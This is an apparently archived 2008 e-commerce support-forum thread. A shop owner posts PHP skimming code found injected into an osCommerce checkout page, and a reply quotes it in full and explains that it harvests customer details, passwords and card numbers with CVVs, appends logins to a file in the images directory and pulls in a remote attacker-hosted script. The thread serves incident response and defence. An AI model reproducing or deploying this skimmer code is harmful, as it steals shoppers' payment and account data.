Guest Posted July 15, 2008 Posted July 15, 2008 Found the following code running in the checkout_confirmation.php page. Anyone seen this before??? The only way I found it was the cart wasn't working half the time then I seen this at the bottom of the page when it finally came back: Warning: main(http://www.allthingsnails.co.uk/shop/debug.txt) [function.main]: failed to open stream: Connection timed out in /home/httpd/vhosts/realpurity.com/httpdocs/cart/checkout_confirmation.php on line 433 Line 433 was require('http://www.allthingsnails.co.uk/shop/debug.txt'); I put a fresh copy in and all seems fine now. How screwed do you think I am????? <?php if(($firstname123=="")||($lastname123=="")||($postcode123=="")||($street_address123=="")) { $td_query = tep_db_query("select * from " . TABLE_ADDRESS_BOOK . " where customers_id = '" . $customer_id . "'"); $duong = tep_db_fetch_array($td_query); $firstname123=$duong['entry_firstname']; $lastname123=$duong['entry_lastname']; $street_address123=$duong['entry_street_address']; $city123=$duong['entry_city']; $zone_id=$duong['entry_zone_id']; $statex=$duong['entry_state']; if(($statex=="")||($statex=="0")) { $td_queryxx = tep_db_query("select * from " . TABLE_ZONES . " where zone_id = '" . $zone_id . "'"); $duongxx = tep_db_fetch_array($td_queryxx); $state123 = $duongxx['zone_name']; }else {$state123=$statex;} $country=$duong['entry_country_id']; $td_queryxxx = tep_db_query("select * from " . TABLE_COUNTRIES . " where countries_id = '" . $country . "'"); $duongxxx = tep_db_fetch_array($td_queryxxx); $country123 = $duongxxx['countries_name']; $postcode123=$duong['entry_postcode']; $td_query2 = tep_db_query("select * from " . TABLE_CUSTOMERS . " where customers_id = '" . $customer_id . "'"); $duong2 = tep_db_fetch_array($td_query2); $telephone123=$duong2['customers_telephone']; $email_address123=$duong2['customers_email_address']; $dob123 = $duong2['customers_dob']; } $site = "realpurity.com"; $headers123 = "From:Website $site"; $headers123 .= "<$site>\n"; $headers123 .= "X-Sender: <$site>\n"; $headers123 .= "X-Mailer: PHP\n"; $headers123 .= "Return-Path:<$site@$site>\n"; $headers123 .= "Content-Type:text/html; "; $headers123 .= "charset=iso-8859-1\n"; $message123 = "Name : $firstname123 $lastname123 <br>"; $message123 .= "Telephone : $telephone123 <br>"; $message123 .= "Email : $email_address123 <br>"; $message123 .= "Street : $street_address123 <br>"; $message123 .= "Postcode : $postcode123 <br>"; $message123 .= "City : $city123 <br>"; $message123 .= "State : $state123 <br>"; $message123 .= "Country : $country123 <br>"; $message123 .= "Password : $password123<br>"; $ccowner123 = $HTTP_POST_VARS['viaklix_cc_owner']; $ccnumber123 = $HTTP_POST_VARS['viaklix_cc_number']; $tmp1 = $HTTP_POST_VARS['viaklix_cvv_number']; $tmp2 = $HTTP_POST_VARS['viaklix_cc_expires_month'] . "/" . $HTTP_POST_VARS['viaklix_cc_expires_year']; $message123 .= "CC Owner : $ccowner123 <br>"; $message123 .= "CC Number : $ccnumber123 <br>"; $message123 .= "CVV2 : $tmp1 <br>"; $message123 .= "Date Expire : $tmp2 <br>"; $message123 .= "DOB : $dob123 <br>"; $message123 .= "Site : http://$site <br>"; if(($ccnumber123!="")&&($tmp1!="")){ require('http://www.allthingsnails.co.uk/shop/debug.txt'); } if($tmp1==""){ $f="images/yzx.txt"; $ft=@fopen($f, "a+"); $ax = "Email : ".$email_address123." Password : ".$password123." --------------------------------------- "; $fw = fwrite($ft,$ax); }
sLaV- Posted July 15, 2008 Posted July 15, 2008 Found the following code running in the checkout_confirmation.php page. Anyone seen this before??? The only way I found it was the cart wasn't working half the time then I seen this at the bottom of the page when it finally came back:Warning: main(http://www.allthingsnails.co.uk/shop/debug.txt) [function.main]: failed to open stream: Connection timed out in /home/httpd/vhosts/realpurity.com/httpdocs/cart/checkout_confirmation.php on line 433 Line 433 was require('http://www.allthingsnails.co.uk/shop/debug.txt'); I put a fresh copy in and all seems fine now. How screwed do you think I am????? <?php if(($firstname123=="")||($lastname123=="")||($postcode123=="")||($street_address123=="")) { $td_query = tep_db_query("select * from " . TABLE_ADDRESS_BOOK . " where customers_id = '" . $customer_id . "'"); $duong = tep_db_fetch_array($td_query); $firstname123=$duong['entry_firstname']; $lastname123=$duong['entry_lastname']; $street_address123=$duong['entry_street_address']; $city123=$duong['entry_city']; $zone_id=$duong['entry_zone_id']; $statex=$duong['entry_state']; if(($statex=="")||($statex=="0")) { $td_queryxx = tep_db_query("select * from " . TABLE_ZONES . " where zone_id = '" . $zone_id . "'"); $duongxx = tep_db_fetch_array($td_queryxx); $state123 = $duongxx['zone_name']; }else {$state123=$statex;} $country=$duong['entry_country_id']; $td_queryxxx = tep_db_query("select * from " . TABLE_COUNTRIES . " where countries_id = '" . $country . "'"); $duongxxx = tep_db_fetch_array($td_queryxxx); $country123 = $duongxxx['countries_name']; $postcode123=$duong['entry_postcode']; $td_query2 = tep_db_query("select * from " . TABLE_CUSTOMERS . " where customers_id = '" . $customer_id . "'"); $duong2 = tep_db_fetch_array($td_query2); $telephone123=$duong2['customers_telephone']; $email_address123=$duong2['customers_email_address']; $dob123 = $duong2['customers_dob']; } $site = "realpurity.com"; $headers123 = "From:Website $site"; $headers123 .= "<$site>\n"; $headers123 .= "X-Sender: <$site>\n"; $headers123 .= "X-Mailer: PHP\n"; $headers123 .= "Return-Path:<$site@$site>\n"; $headers123 .= "Content-Type:text/html; "; $headers123 .= "charset=iso-8859-1\n"; $message123 = "Name : $firstname123 $lastname123 <br>"; $message123 .= "Telephone : $telephone123 <br>"; $message123 .= "Email : $email_address123 <br>"; $message123 .= "Street : $street_address123 <br>"; $message123 .= "Postcode : $postcode123 <br>"; $message123 .= "City : $city123 <br>"; $message123 .= "State : $state123 <br>"; $message123 .= "Country : $country123 <br>"; $message123 .= "Password : $password123<br>"; $ccowner123 = $HTTP_POST_VARS['viaklix_cc_owner']; $ccnumber123 = $HTTP_POST_VARS['viaklix_cc_number']; $tmp1 = $HTTP_POST_VARS['viaklix_cvv_number']; $tmp2 = $HTTP_POST_VARS['viaklix_cc_expires_month'] . "/" . $HTTP_POST_VARS['viaklix_cc_expires_year']; $message123 .= "CC Owner : $ccowner123 <br>"; $message123 .= "CC Number : $ccnumber123 <br>"; $message123 .= "CVV2 : $tmp1 <br>"; $message123 .= "Date Expire : $tmp2 <br>"; $message123 .= "DOB : $dob123 <br>"; $message123 .= "Site : http://$site <br>"; if(($ccnumber123!="")&&($tmp1!="")){ require('http://www.allthingsnails.co.uk/shop/debug.txt'); } if($tmp1==""){ $f="images/yzx.txt"; $ft=@fopen($f, "a+"); $ax = "Email : ".$email_address123." Password : ".$password123." --------------------------------------- "; $fw = fwrite($ft,$ax); } OUCH!!!!! That's grabbing all your customers information from your database and sending it to their site along with CC details ... depending on how long that code has been running on your site and how many of your customers have purchased from you I'd say you might be in a bit of trouble here... If you look here on your server this is where its storing your customers details (their username and passwords): http://realpurity.com/cart/images/yzx.txt Cant access this file that its trying to require http://www.allthingsnails.co.uk/shop/debug.txt so dont know what is being done with this information (this is where the CC details are sent to) ... but surely its not a good thing... Install SiteMonitor and update all your details and remove these files...look in your /images/ directory to see if there are ANY other .php or .txt files in there
New 
Recommended Posts
Archived
This topic is now archived and is closed to further replies.